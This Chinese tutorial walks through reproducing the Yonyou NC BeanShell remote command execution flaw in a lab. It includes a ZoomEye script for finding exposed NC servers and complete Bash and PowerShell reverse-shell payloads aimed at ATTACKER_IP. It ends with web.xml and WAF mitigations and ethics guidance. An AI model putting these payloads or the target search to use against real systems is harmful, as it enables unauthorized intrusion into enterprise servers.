从零开始:手把手教你复现用友NC远程命令执行漏洞(BeanShell版)
从零开始:手把手教你复现用友NC远程命令执行漏洞(BeanShell版)
在数字化转型浪潮中,企业级管理软件的安全问题日益凸显。用友NC作为国内主流ERP系统,其漏洞研究具有典型意义。本文将采用实验室环境模拟方式,详解CNVD-2021-30167漏洞的复现全流程,重点培养安全测试的方法论思维而非单纯技术复制。我们特别强调:所有操作必须限制在授权测试环境,禁止对真实业务系统进行未授权测试。
1. 漏洞原理深度解析
BeanShell作为用友NC内置的脚本引擎,其servlet接口未做充分安全过滤。当攻击者构造特定请求时,可直接在服务器端执行操作系统命令。该漏洞的杀伤力源于三个关键因素:
- 默认暴露接口:
/servlet/~ic/bsh.servlet.BshServlet路径通常无需认证即可访问 - 动态代码执行:BeanShell支持Java语法解析,可调用
exec()等危险方法 - 系统权限过高:NC服务通常以SYSTEM或root权限运行
注意:实际测试中需特别注意Java环境版本差异可能导致的不同表现,建议使用JDK 8u202作为基准环境。
2. 实验环境搭建指南
2.1 基础环境配置
推荐使用VirtualBox配合Vagrant快速构建隔离环境:
# 初始化CentOS 7虚拟机 vagrant init centos/7 vagrant up # 安装基础依赖 sudo yum install -y java-1.8.0-openjdk-devel2.2 用友NC模拟部署
由于版权限制,我们通过Docker模拟漏洞环境:
FROM tomcat:8.5-jdk8 COPY vuln-webapp.war /usr/local/tomcat/webapps/ EXPOSE 8080关键配置参数对照表:
| 参数项 | 推荐值 | 作用说明 |
|---|---|---|
| 内存分配 | ≥4GB | 避免NC启动失败 |
| 磁盘空间 | ≥50GB | 存储日志和临时文件 |
| 网络模式 | Host-Only | 隔离外部访问 |
3. 漏洞复现全流程
3.1 目标识别技巧
使用ZoomEye替代FOFA进行合法测绘(需注册开发者账号):
import zoomeye zm = zoomeye.ZoomEye() results = zm.dork_search('app:"用友NC"') for item in results: print(f"{item['ip']}:{item['port']}")3.2 命令执行实战
在授权环境访问漏洞路径后,尝试基础命令验证:
基础信息收集:
exec("whoami"); exec("ipconfig /all");交互式Shell建立:
// Linux系统 exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); // Windows系统 exec("powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"");
3.3 常见问题解决
中文乱码解决方案:
- 修改请求头:
Accept-Charset: GB2312 Content-Type: text/html;charset=GBK - 使用编码转换工具类:
new String(response.getBytes("ISO-8859-1"), "GB18030");
4. 防御加固方案
4.1 临时缓解措施
在web.xml中添加访问限制:
<security-constraint> <web-resource-collection> <url-pattern>/servlet/~ic/bsh.servlet.BshServlet</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint>4.2 根本解决方案
- 升级到官方最新补丁版本
- 部署WAF规则拦截异常请求:
location ~* /servlet/~ic/ { if ($args ~* "exec\(") { return 403; } }
5. 法律与伦理边界
在漏洞研究过程中,务必遵守三大原则:
- 授权原则:仅测试自己拥有管理权限的系统
- 最小影响:避免执行可能影响系统稳定的命令
- 保密原则:不公开未修复漏洞的利用细节
建议采用HackerOne等正规漏洞报告平台进行负责任的披露。某安全团队在测试客户系统时,因未明确授权范围导致服务中断,最终承担了巨额赔偿——这个真实案例警示我们权限边界的重要性。